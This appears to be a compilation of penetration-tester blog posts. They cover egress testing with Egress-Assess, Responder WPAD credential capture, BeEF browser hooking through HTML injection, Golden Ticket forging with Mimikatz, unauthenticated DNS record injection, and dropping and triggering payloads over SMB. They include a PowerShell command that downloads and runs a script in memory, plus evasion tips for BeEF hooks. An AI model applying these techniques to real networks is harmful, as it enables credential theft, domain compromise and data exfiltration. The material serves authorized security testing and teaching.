Egress-Assess in Action via Powershell

For a week or two now, rvrsh3ll (@424f424f) has been working on creating a powershell client for Egress-Assess that would allow Windows users to simply load the script in memory and use it to test egress filters.  As of yesterday evening, his script has been merged into Egress-Assess, and is now available in the Github repository.

@424f424f went one further and wanted to send some screenshots to demo any potential detections when sending data outside of his network.  But first, let’s demo the powershell script.

Loading up the powershell script is easy, and doesn’t require any file to be placed on disk.  To do this, the Windows machine will need to have internet access.  Start powershell on the Windows machine you want to run Egress-Assess from, and use the following command to load it into memory:

IEX (New-Object Net.Webclient).DownloadString(‘‘)

In-Memory Download EA

Now the powershell script is in memory and ready for use!  Usage is near identical with the python client.  To send data over http to another system running Egress-Assess you can use the following command:

Invoke-EgressAssess -client https -datatype cc -Verbose -ip

EA Powershell https

Server side, we can see that the data is received.

Server received powershell http

@424f424f has a Snorby instance in use and ran Egress-Assess through it.  The following were some of the alerts that were generated (you want to hope that similar results are generated for your clients!).

Snorby credit cards Snorby social security

If anyone has any questions on the usage, be sure to hit me up.  Otherwise, a big thanks again to Rvrsh3ll (@424f424f) for sending this awesome addition.

Egress-Assess – Testing your Egress Data Detection Capabilities

Github Link:

On a variety of occasions, our team will attempt to extract data from the network we are operating in and move it to another location for offline analysis.  Ideally, the customer that is being assessed will detect the data being extracted from their network and take preventive measures to stop further data loss.

When looking to copy data off of our target network, an attacker can do so over a variety of channels:

  • Download data through Cobalt Strike’s Beacon (over http or dns)
  • Download data through a Meterpreter Session
  • Manually moving data over FTP, SFTP, etc.

While we routinely inspect and analyze data from the customer environment in order to aid in lateral movement, we also provide customers data exfiltration testing as a service. Performing a data exfiltration exercise can be a valuable service to a customer who wants to validate if their egress detection capabilities can identify potentially sensitive data leaving their network.

I wanted to come up with an easy to use solution that would simulate the extraction of sensitive data from my machine to another.  While trying to plan out a tool, I targeted a few protocols commonly used by attackers:  FTP, HTTP, and HTTPS.  To ensure that I could generate “sensitive” data that would be discovered during defensive operations, I needed to identify what multiple organizations would highly value. Two different sensitive data types that would likely have signatures across organizations are social security numbers and credit card numbers and I decided to target those forms of data in my proof of concept.

After spending a couple days piecing bits of code together, I am happy to release Egress-Assess.

Updated EgressAssess Help Menu

Egress-Assess can act as both the client and the server for the protocol you wish to simulate.  It supports exfiltration testing over HTTP, HTTPS, and FTP.  I envision the tool being used on an internal client and an external server where data would be passed over network boundaries. Once cloned from the repository, the dummy data can be transferred from one machine to another. 

To extract data over FTP, you would first start Egress-Assess’s FTP server by placing it in server mode with the ftp and providing a username and password to use:

./ --server ftp --username testuser --password pass123

FTP Server Setup EA

Running that command should start something similar to the following:

FTP Server

This shows that the FTP server is up and running.  With this going, all we need to do now is configure the client to connect to the server!  This is simple, can can be done by telling Egress-Assess to act in client mode and use ftp, provide the username and password to use, the ip to connect to, and the datatype to transmit (in this case, social security numbers).  Your output should look similar to the following…

./ --client ftp --username test --password pass --datatype ssn --ip


Within the same directory as Egress-Assess, a “data” directory will be created.  Within it is where all transmitted files will be stored.  At this point, the transfer is complete via FTP!

You can also do the same over HTTP or HTTPS.  Again, the first step will be starting one instance to act as the server in http mode.

./ --server http

HTTP Server Startup

This will now start a web server to listen on port 80.  The next step is to have your client generate new dummy data, and send it to the web server.  Only this time, we’ll change it up by specifying the approximate amount of data we want to generate.

By default, Egress-Assess will generate approximately 1 megabyte of data (either social security numbers or credit card numbers).  This amount can be changed using the “–data-size” flag.  If we want to send approximately 15 megabytes of credit card data to our web server over http, the command may look as follows…

./ --client http --data-size 15 --ip --datatype cc

HTTP Client setup

http data sent

As you can see above, the file was transferred, and our web server received the file!

That about rounds out the current state of Egress-Assess.  Future revisions will include making a more modularized tool so users can easily add support for new protocols, and new data types for transfer.  If there are any other requests, I’d love to hear them!

Getting Hooked up with Responder and Beef

Responder is a really effective tool that I’ve written about before which can be used to easily obtain user credentials on a network.  However, in Responder’s 2.0 release, the ability to perform HTML injection attacks were added to the tool.  This capability can be easily utilized to perform a variety of nefarious actions against our targets.  The first tool that I thought using to leverage the HTML injection capabilities of Responder, is Beef.  Beef is described as being a browser exploitation framework.  The goal of an attacker utilizing Beef would be to “hook” another user’s browser.  Once hooked, Beef contains a large number of modules that can be used to attack the victim’s web browser (which I would perform a disservice if I tried to describe all of Beef’s capabilities in a single post).  So the attack that I’m going to demonstrate is using Responder’s ability to inject HTML and hook systems on the network I am targeting with Beef.

Edit: @Antisnatchor provided some really good feedback in the comments.  I think it’s worth everyone reading what he said, so they are copied here:

“Few things to add, change the following in the main config.yaml config file:

– reduce xhr_poll_timeout to 500 (milliseconds), so polling will happen twice a second
– change hook_file to jquery.js or something different to change the hook name (more stealthy), as well as hook_session_name and session_cookie_name to different values.
– enable the Evasion extension, just use ‘scramble’ + ‘minify’ as obfuscation techniques. This will minify/pack JS and scramble variables like BeEF/beef to random ones.
– change default BeEF credentials and web_ui_basepath

I would also add the BeEF hook tag in rather than .

Then once it’s up, you can automate module lanching to multiple hooked browser based on fingerprinting results via the RESTful API.” 

First, you’re going to need to get Beef started on your attacking platform.  If you’re using Kali, it’s located within the /usr/share/beef-xss directory.  Once within it, simple type “./beef” and wait as the framework starts up.  Your console should look similar to the following once it is ready to go:

Beef startup

Next up, we need to slightly modify Responder’s config file.  If you haven’t already, clone the project to your attacking platform, and then open up Responder.conf in a text editor.  Within the Responder.conf file you’re going to want to change the “HTMLToServe” value.  To carry out the attack, we want to inject Beef’s javascript file used to hook browsers.  I just changed the value to be:

HTMLToServe = <html><head></head><body><script src="" type="text/javascript"></script></body></html>

Your config should look similar to the following now:

Responder Config

With this added in, Responder will inject the javascript containing our beef hook into any page that it is able to do so.  First, I’m going to need to start Responder.  The options that I am passing into Responder tells it to listen on my local IP, stand up a rogue wpad proxy, and display verbose messages.

Start Responder

With both Beef and Responder up and running, it’s time to get our hooks!  To test this out, I’m going to just have the web browser from my Windows 7 victim VM attempt to navigate to http://intranet/.  When it requests the web page, Responder will serve up the a web page.  In my case, I don’t have an actual machine called “intranet” within my lab network, so Responder will just serve up a web page only containing the Beef hook code.


Not only did Responder see the web request, but it was also able to obtain the NTLMv2 hash use by the current user “sonofflynn”.  If I were to look at the web page on my Windows 7 VM, it just shows a blank page.  However, the blank page has also loaded up my beef hook, and after logging into the Beef console, I can see it’s successfully been hooked.  With our victim’s browser hooked, we can now perform a wide variety of enumeration and attacks against or through the victim’s browser.  I highly recommend to review the large number of posts that talk about beef and the variety of attacks it contains.

Beef Hooked

I have had at times Responder act “funny” by serving up what appears to be random ascii code vs an actual website.  I have also had issues with it injecting the HTML code at times.  However, this seems to work best for me to get repeatable results and hooks.  If there’s something that I’ve missed, or a better way to inject html code/beef hooks/etc. I’d love to hear about it and get to learn a better way (or maybe the right way :)).  Otherwise, hope that this helps, and feel free to hit me up for any questions!

Responder & User Account Credentials – First Come, First Served

Responder is an awesome tool that was created by Laurent Gaffie and can be extremely effective to use on pen tests.  I recently had the opportunity to use Responder, and it returned valid domain credentials within about 10 minutes.  I wanted to write this post as an opportunity to document what worked for myself.  With that said, Larry Spohn also wrote an excellent blog post on essentially the same attack which can be viewed here, so be sure to go and check that post out as well!

Responder can return results two different ways.  We can try to receive the NTLM Challenge hash(es) from workstations, or Responder can return credentials via basic authentication.  Ideally, the easiest for an attacker to work with will be basic auth based authentication due to the data being easily reversible since it is base64 encoded.

The specific vulnerability that is being attacked in this situation is that workstations will be configured to automatically detect proxy settings for the network they are operating on by default.  When a workstation attempts to find the proxy settings needed, it does so by requesting for “WPAD” initially over DHCP.   If the workstation doesn’t receive a response, it will then make multiple DNS requests.  If DNS also doesn’t return any results, the workstation will finally fall back to requesting over NetBIOS (source). If configured to do so, Responder will can act as a rogue wpad proxy.  Responder can then serve a PAC file (configured as you see fit) and attempt to proxy all connections through itself.

One trick Responder can do (if configured to do so) is to respond to http requests from workstations that are attempting to access local resources (such as http://intranetsite).  The nifty aspect to this trick is to the user, the pop-up will appear as a normal looking authentication box that is prompting the user to enter their credentials.  Once entered, the credentials are transferred to the attacker, base64 decoded, and displayed to the attacker.  So, that’s the background to this attack, how about lets check it out?

First, we’re going to need to configure how Responder is going to operate on the network.  We’re going to need to pass it a couple command line options:

  • -i <IP Address or network interface> – The IP address to listen on
  • –wpad – Tells Responder to start a “rogue” wpad proxy server
  • -b – Tells Responder to return Basic Authentication information vs. NTLM
  • -F – Tells Responder to force NTLM or Basic authentication from any machine attempting to access the wpad file
  • -f – Tells Responder to fingerprint the host

Starting Responder

As you can see, Responder is pretty simple to setup and get up and running.  Once the previous command has been run, you should see something similar to the following:

Responder Started

This is roughly what Responder is going to look like once it is up and running.  For now, you can sit and wait for information to start coming in.  A good time to utilize Responder is when you’re first getting started on an assessment.  Responder can be one of the first tools you get running, and you can just leave it be and check back in on the results later.

Once Responder has been running for a while, check out if there’s been any juicy information returned to us!  Below is a what your output will likely look similar to:

Responder Output

What’s awesome to see here, is the “HTTP-User & Password:” line!  We can see the username “testuser” and password “badpassword” were returned to us, so now we have the first set of user credentials!  From a user’s perspective, this is what the popup looked like on a Win 8.1 desktop:

WPAD Desktop

This is a fairly typical screen and users are *LIKELY* going to enter their account information without a second thought.

At any point, you can stop running Responder, and it will have logged all credential information into a file for viewing.  In my case, this is what I have on my attacker platform:

Responder Loot File

If the same user were to keep entering their username and password, there would be duplicate (or more) entries of the credentials within the loot file.

Responder is an extremely powerful tool that can be used to quickly grab credentials when plugged into a network segment that users are also operating on.  I highly recommend using it as it can be a great way to get an initial foothold into your target network.

Mimikatz, Kiwi, and Golden Ticket Generation

First off, I want to state that the purpose of writing this post is to help myself learn how to use Golden Tickets on assessments.  If you want to see some great write-ups about Golden ticket generation, be sure to look at these:

Those posts are significantly more authoritative on the subject than mine, I just wanted to write this out so I can reference this on assessments.

Golden tickets can offer an extremely powerful to escalate privileges for an attacker on a network, or obtain access to resources which are only available to a select group.  However, it’s absolutely worth mentioning that with this great power, pen testers need to take extra precaution to protect any golden tickets that they’ve created.  It’s highly recommended that any tickets created should be securely encrypted during your assessment, and securely deleted when it is no longer needed.

Golden Tickets can be generated two different ways.  The first way is through the kiwi extension in Metasploit, and the other is through Mimikatz’s stand alone application.  This post will show how to use both options to generate your ticket.  Lets start off with Metasploit’s Kiwi Extension.

At this point, I am going to assume that you have a meterpreter session, as SYSTEM, on the domain controller for the domain you are targeting.  Within your session, you want to load the kiwi extension by typing:

load kiwi

Load Kiwi

Now that the kiwi extension is loaded, when you type help, you should see the additional commands that are available for you.  The command that we’re interested in is golden_ticket_create.  In order to create the golden ticket, we’re going to need at least four pieces of information (tickets can be further customized with additional information, but the generation process needs a minimum of four):

  • The Domain Name
  • The Domain SID
  • The krbtgt account’s nt hash
  • The user account you want to create the ticket for

MSF Golden Ticket Create

To get this information, you can just interact with the meterpreter session you already have active.  Drop into a shell, and run:

whoami /user

Domain Sid

The domain SID starts at the S-1… and goes to …70370.  Copy and paste that information into a text file.  Next up, grab the domain name.  One way I like to do this is just running:

ipconfig /all

Find Domain Name

In this case, I can see (and I know) the domain name is  So, this info should also be saved off to a text file.  The last big hurdle that you will need is the nt hash from the krbtgt account.  Since you should be on the DC, perform a hashdump and obtain the krbtgt hash.

Now that we have all of the required information, we can generate a golden ticket!  At this time, go ahead and determine the user account you are wanting to impersonate, or, you can actually use an account that is nonexistent.  Now, it’s just getting everything in place for the command.  In our case, the command looks like this:

golden_ticket_create -d -k <nthash partially redacted> -s S-1-5-21-522332750-710551914-1837870370 -u invaliduser -t /root/Downloads/invaliduser.tck

MSF Ticket Created

We can see from the previous picture that the ticket was successfully created and written out.  The user that we are impersonating is “invaliduser”, and the ticket is saved to /root/Downloads/invaliduser.tck.

Now that the ticket has been created, it’s time to apply it to our current session.  To do this you want to type the following command:

kerberos_ticket_use /root/Downloads/invaliduser.tck

Ticket applied

In the above screenshot, I cleared all existing tickets, then applied the created ticket, and then we can see the golden ticket in use.  Note: you don’t have to purge existing tickets, but I did for demonstration purposes.

Now that the ticket has been applied, a low level user account can now act as a Domain Administrator:

MSF Ticket Applied

The user account could not previously access the DC’s C$ share, but with the ticket applied, it can!  We’re now operating with the same level of permissions as a DA!


So, our other option for generating and using golden tickets is to use the mimikatz binary.  You can download that from here.  Once downloaded, navigate to the mimikatz binary and start it.  We can re-use the information that we already have to generate our golden ticket.  To generate the ticket, you’re going to run a command similar to the following:

kerberos::golden /user:invaliduser2 / /sid:S-1-5-21-522332750-710551914-1837870370 /krbtgt:<ticket partially redacted> /ticket:invalidadmin.tck /groups:501,502,513,512,520,518,519

(Thanks to Benjamin Delpy (@gentilkiwi) for letting me know that I failed at redacting my own krbtgt hash, haha.  This is why you should always post things from a test/lab domain :).  Pic below is now updated)



In this case, we’re creating a ticket for a non existent user account, the User ID is at its default value (500), and we’ve added groups that the user should be part of.  The ticket is saved to the invalidadmin.tck file within the same directory that the mimikatz binary is running from.

Now that the ticket has been created, we just want to apply it with Mimikatz.  This can be done by running the following command:

kerberos::ptt invalidadmin.tck

Win Ticket Submission

And to verify that we have administrative access to the domain controller again…

Access DC Share

We can actually also see from the DC that the Logon was successful, even though it was with an account that doesn’t exist within the domain!

Windows Log

And that’s about it!  Writing this out helped me gain a better understanding about generating and using golden tickets, hope that it can help someone else too!

DNS Modification with DNSInject for Nessus Plugin 35372

Part of our normal pen test process, when performing an external assessment, is running a Nessus scan against the in-scope IP range(s) provided by our customer.  We usually have this running in the background while carrying out our own analysis against the IP ranges.  On a past assessment, we started with this same process.  After some time went by, I checked our scan results that we had so far, and found an interesting vulnerability listed.  Specifically, Nessus plugin 35372:

Nessus Plugin Info

Looking at the finding details, Nessus also provided the DNS zone that is vulnerable to modification.  However, one thing that I didn’t see was an existing tool that allowed me to perform the record injection attack (see note below).  I have only seen a finding similar to this on an internal assessment, and in that case I used dnsfun.  However, I wasn’t sure dnsfun would work in this case, and I wanted to learn how to write a script that would perform this attack myself, so I decided to do just that.

I started off by checking out RFC 2136, and learned that I’m going to need to specify the zone that I want to modify (add/remove) a record for and the resource record itself that will be modified, while being sure to set the DNS packet’s opcode to 5 (Update).  This is something that could be easily done with scapy.

Scapy Packet Definition

The great thing about scapy, is you can define any specific packet attribute values that you wish (ttl, record type, etc.), and the attributes that aren’t specified are automatically populated by scapy with their proper values.  The above code states that I want to send a packet to a specific destination, it’s a DNS UDP packet, with the opcode set to 5 (update), and the DNS specific information is set by the command line options provided by the user.  And… that’s it!

I wrapped this up into a script that lets you either add or delete A records on a vulnerable name server pretty easily.  It’s called, simply, DNSInject.

DNSInject Options

To add a record with, just specify the add action, provide the vulnerable name server, the A record you wish to create, and the IP it will point to.  Your command should look similar to the following:

./ --add -ns -d thisisa.test.local -ip


To delete a record, you only need to provide the vulnerable name server, and the record to delete.  Again, your command could look similar to the following:

./ --delete -ns -d thisisa.test.local


To get and use DNSInject, just clone the following github repo –

Hope this helps, and if you have any questions, feel free to ask!


Note: Of course, after completing writing this script, I discovered two other options which can help carry out this attack, so I wanted to be sure to mention them.  Scapy has a built in function to both add and delete records, and you could also use nsupdate. Definitely be sure to check out those options as well!

Multiple Methods for Dropping Payloads with Credentials (or Hashes)

I like the cliche that “There’s more than one way to skin a cat” because it’s how I like to operate.  I like to have a lot of different options to choose from when attempting to reach a certain goal.  In my previous post, I showed how psexec_command can be used to trigger an executable once it’s been placed on a machine.  But this could lead to the question, how can we get our payload on to our target machines in the first place?

This post won’t go into how to get your initial compromise, I assume you’ve already done that, and you’ve been able to dump hashes (and now because of mimikatz’s awesomeness) and/or cleartext credentials.  So the next step in an assessment is not to blindly move around a network, but to identify targets of value.  Once you’ve done this, our goal is to get our payload onto that target.  I’m going to show you a couple of different ways that you can do this, and I’d love to hear from anyone else on other ways to place a binary on a machine.

But for now, our first method, a normal shell.

Note: All methods displayed below will only work if the account you are operating as has permissions to drop binaries/files in the locations you are doing so.  Otherwise, it won’t work.

Windows Shell:

We can use a normal shell within windows to help us move our payload around the network.  The nice thing about using the built in shell is that it doesn’t require the use of any other tools and is simply using built in OS capabilities.  In our picture below, I’m interacting with a shell prompt spawned on a machine through a meterpreter session.  We can see that we have a binary called “evilpayload.exe”.  So, our goal is to move this payload from one machine to another.  This is easily done by using the copy command from within the shell and pointing our payload (which in this case is already on our compromised machine) towards a share on our target machine, as demoed below:


Metasploit Upload:

Metasploit has the capability to simply upload a file to a machine when provided with all the required options.  To use this, call the auxiliary/admin/smb/upload_file module.  As you’ll see in the picture below, I’ve provided a sample set of values that will allow the module to upload my payload to the target machine.  One item to note, the picture does not show the SMBUser, SMBPass, and the SMBDomain values being used with the module.  You will need to provide values for those (advanced) options in order for the module to authenticate and upload the payload to your target machine.

Once all options have been provided, executing the module will upload your binary to the target machine.


Chris Gates wrote up an awesome attack path he encountered and used the upload_file module, and can be seen here.

Metasploit Psexec:

The metasploit psexec module can be used to upload a binary, either custom compiled or generated by the metasploit framework, onto the target machine.  The obvious difference with this module is that after uploading the binary to your target machine, the framework will create a system service which executes the payload, as compared to almost all other methods within this post that simply drop the binary on the system.

As you view the screenshot below, we can se that our binary was uploaded and triggered, so we received our callback.  One item to note is that even when providing a custom executable (as I did below), the executable is renamed when it is dropped on the target machine.  In the event that you need to trigger your executable again, you’ll need to note the executable’s name on disk (in this instance, it is LtcvppBc.exe).


The impacket library has been something that I’ve been playing around with for a little bit lately.  It has a lot of cool capabilities and allows you to write scripts to interact with a variety of protocols, one of them being SMB. is a sample script written by the developers of the impacket library to show how the library can be used to interact with SMB.  Smbclient script will let us connect to a remote share with either cleartext credentials or a hashes and upload our binary.

To initiate the connection, we’ll use open and then the ip address of the machine we want to connect to.  Once we’ve connected to the machine, we’ll authenticate with the credentials we’ve already obtained via the login command (if we only had hashes, we would use the login_hash command).  Once authenticated, we type shares to see the list of shares to connect to, and then use the C$ share.  Now, it’s simply invoking the put command, along with the file we want to upload, and then it’s complete.  You can use the ls command to verify that your file has been placed on the remote machine.

A sample workflow on how this can be used is in the screenshot below.


The impacket library developers also left us with another awesome script for uploading files to a machine, and it’s their implementation of psexec, using the impacket library, within a python script.  This script will let us spawn a command shell on the target machine, but also comes with extra capabilities, such as the ability to upload files.  We can use this script to upload our payload, and then execute it.  Great part about it, is that our session is going to be running as System!

To call, we provide it with the credentials we want to authenticate to the machine with, the IP address of the victim machine, and the process we want to spawn.  After this, it’s simply using the put command to drop our payload on the machine, and then we can just call it within the command shell.

Larry Spohn also wrote a great post on combining Veil with which you can read here.

A sample workflow of the script can be seen below:



I hope this has helped to give everyone multiple different options to drop files on machines when you have user credentials.  There are other ways as well, and I’m interested in hearing other methods that have been useful for you.

psexec_command – When You Can’t Trigger Your Payload

Ever been able to drop a payload on a machine, but not execute it? I’ve had a few odd times on assessments and/or CTFs where I’ve been able to drop a payload onto a machine that I am targeting, but haven’t been able to trigger it. An example I can talk to is when I’ve created a custom executable, such as one generated from Veil, and use metasploit’s psexec to drop the payload on the machine (which I’ve already obtained hashes or clear-text credentials), but upon uploading the executable to the target machine, for some reason, I don’t get the callback. When this happens, as long as I can verify from the metasploit output (assuming that I used metasploit’s psexec) that uploading the binary was successful, I can use psexec_command to attempt to re-trigger the payload.

So, how do we do this? Here’s how I’ve made this work before:

First, we need to attempt to psexec into a machine with our custom executable. One thing to note, I prefer to use the C$ share when dropping a payload on a machine. There’s no real reason other than the command you provide to metasploit (later) is shorter. Once you’ve provided Metasploit’s psexec module with all the options it needs and execute it, you should see something similar to the following:

exploit - 1

But what we sometimes don’t get is the all-important awesome sign of “Sending Stage…”. So.. how can we fix that?

Based off of the Metasploit log above, we can see that our custom executable was uploaded to the target machine as wdKedAbD.exe and it was dropped into the C$ share. We have all the information necessary to manually call our executable and attempt to trigger it via metasploit’s psexec_command. To do that, our configuration should look something like the following:


Note: You will need the double backslashes when setting your “Command” value.

The thing to note here is that we are calling the same executable that was uploaded in our original psexec attempt. This is what is allowing us to attempt to re-trigger the payload that was already uploaded to the machine. With all of our payload variables set, we can now run this single command against the same machine. The output upon executing our psexec_command module should look like the following:


We can see from this output that our payload was triggered, and the second stage was sent, and we opened a new meterpreter session. Success!

If anyone has any questions, feel free to ask here or on twitter @ChrisTruncer!